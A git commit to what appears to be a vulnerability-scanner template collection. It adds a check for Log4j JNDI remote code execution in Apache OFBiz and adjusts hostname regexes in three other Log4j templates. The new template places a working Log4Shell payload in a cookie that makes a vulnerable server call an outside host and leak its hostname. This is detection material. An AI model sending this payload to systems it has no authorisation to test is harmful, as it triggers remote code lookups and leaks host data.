Apache OFBiz Log4j JNDI RCE (#3374)

* Added Apache OFBiz Log4j JNDI RCE * fixed matcher to match hostname in both cases
2021-12-18 15:46:49 +05:30 · 2021-12-18 15:46:49 +05:30 · 4af3a04b3c
parent ccb036e2c2
commit 4af3a04b3c
4 changed files with 39 additions and 6 deletions
--- a/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
+++ b/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
@ -0,0 +1,33 @@
+id: apache-ofbiz-log4j-rce
+
+info:
+  name: Apache OFBiz Log4j JNDI RCE
+  author: pdteam
+  severity: critical
+  tags: ofbiz,oast,log4j,rce,apache
+
+requests:
+  - raw:
+      - |
+        GET /webtools/control/main HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+
+    extractors:
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
--- a/vulnerabilities/apache/apache-solr-log4j-rce.yaml
+++ b/vulnerabilities/apache/apache-solr-log4j-rce.yaml
@ -26,11 +26,11 @@ requests:
      - type: regex
        part: interactsh_request
        regex:
-          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
-          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
--- a/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
+++ b/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
@ -31,11 +31,11 @@ requests:
      - type: regex
        part: interactsh_request
        regex:
-          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
-          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
--- a/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml
+++ b/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml
@ -28,11 +28,11 @@ requests:
      - type: regex
        part: interactsh_request
        regex:
-          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
-          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output